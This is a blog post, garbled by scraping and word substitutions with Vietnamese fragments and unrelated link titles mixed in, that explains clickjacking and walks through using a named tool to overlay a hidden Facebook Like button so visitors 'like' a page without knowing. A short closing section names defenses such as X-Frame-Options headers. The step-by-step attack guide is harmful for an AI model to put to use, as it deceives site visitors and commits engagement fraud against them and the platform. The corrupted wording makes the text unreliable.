Hack fb

      56

In this blogpost I will show you how to use a technique called ‘clickjacking’ khổng lồ gain thousands of real Facebook likes, Twitter Followers, Google +1’s, you name it. You could potentially use this hachồng lớn get every single visitor of your trang web lớn like your Facebook page without them even knowing.

Bạn đang xem: Hack fb

quý khách vẫn xem: Free haông chồng lượt thích facebook năm trước iq

But more importantly, I will also show you how you can prevent this from happening to lớn your website. Be ready for some technical terms. In order to lớn be able to lớn follow this tutorial, you should at the very least have some basic knowledge of HTML.

And please, before you read any further, be sure to read và underst& the warning below!

Warning: Clickjacking is an extreme blackhat practice. At internetstartup.vn we have sầu never used, nor will we every use, any blackhat hacks or other such methods to lớn gain exposure. We recommend you bởi vì neither! The information provided in this article is lớn be used for educational purposes only & to lớn help protect yourself against such hacks. We are not responsible for any misuse of the information provided.

What the heông chồng is clickjacking anyways?

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trichồng a user inkhổng lồ clicking on a button or link on another page when they were intending lớn cliông xã on the the top màn chơi page. Thus, the attacker is “hijacking” clicks meant for their page và routing them lớn another page, most likely owned by another application, domain name, or both.

For example, imagine a hacker who builds a website site that has a button on it that says “cliông xã here khổng lồ go to Google”. However, on top of that website page, the attacker has loaded an iframe with a Twitter Follow button, and lined up exactly the “Follow” button directly on top of the “cliông xã here lớn go khổng lồ Google” button. The victlặng tries to lớn cliông xã on the link khổng lồ Google, but instead actually clicked on the invisible Twitter Follow button. The victlặng now starts to lớn follow the attacker on Twitter without even knowing it. In essence, the attacker has “hijacked” the user’s click, hence the name “Clickjacking”.

Bachồng in 2009, clickjacking made the news in the size of a Twitter worm. This clickjacking attaông chồng convinced users lớn cliông chồng on a button which caused them lớn re-tweet a links to the malicious page, causing it khổng lồ go viral.

Clickjacking was initially discovered by Robert Hansen và Jeremiah Grossman.

Xem thêm: Tik Tok Trung Quốc: Hướng Dẫn Cài Tik Tok Trung Quốc Đơn Giản Nhất

Digging in

In order lớn bởi vì this, we will be using a brand new tool called Quickjack (a brilliant but nasty tool by Samy Kamkar) to lớn automatically generate the code that allows the victyên khổng lồ click anywhere on the page in order lớn get clickjacked. But before we can vày any of that, we will have to lớn create a like button.

Step 1: Creating a Facebook Like button

You can head over to lớn this Facebook page which allows you lớn easily generate a like button. Make sure lớn disable the “Show Friends’ Faces” option, & don’t include the nói qua button. Then click on the ‘Get code’ button.


*

Step 2: Set-up a page for the Like button

Now that we have sầu the code for the like button, we will need a page to lớn display it on. Copy and paste the code you just generated on Facebook inlớn a blank HTML tệp tin, & make sure you upload it to your web server.


*

Step 3: Generate the clickjacking script

This is where the fun begins. Head over to lớn the Quickjaông xã tool I told you about earlier, and enter the links khổng lồ your lượt thích button page in the input đầu vào field. Then cliông chồng on the ‘Go’ button next to the input:


*

Quickjaông chồng will load your lượt thích button into it’s page, but because the like button is so small, it will appear behind the đầu vào and buttons from Quickjack itself. Use the drag tool (black arrow inhỏ on the top left) lớn drag Quickjack’s controls below your lượt thích button.

Next, we have sầu to instruct Quickjaông chồng where we want to force the user to cliông chồng. We want our victims lớn cliông chồng on the like button, so go ahead & cliông chồng on it. A red crosshairs will appear to lớn indicate where you’ve sầu mix your click-target. You can now click on the “I’m done!” button to generate the code for the clickjachồng script.

Xem thêm: Bản Đồ Gmap - Bản Đồ Việt Nam


*

Step 4: Let the clickjacking begin!

Defending against Clickjacking

There are two main ways khổng lồ prevent clickjacking:

Sending the proper X-Frame-Options HTTPhường response headers that instruct the browser khổng lồ not allow framing from other domainsEmploying defensive code in the UI lớn ensure that the current frame is the most top màn chơi window

I don’t want to lớn make this article too technical, so for more information on Clickjacking defense, please head over to the Clickjacking Defense Cheat Sheet.


Chuyên mục: Digital Marketing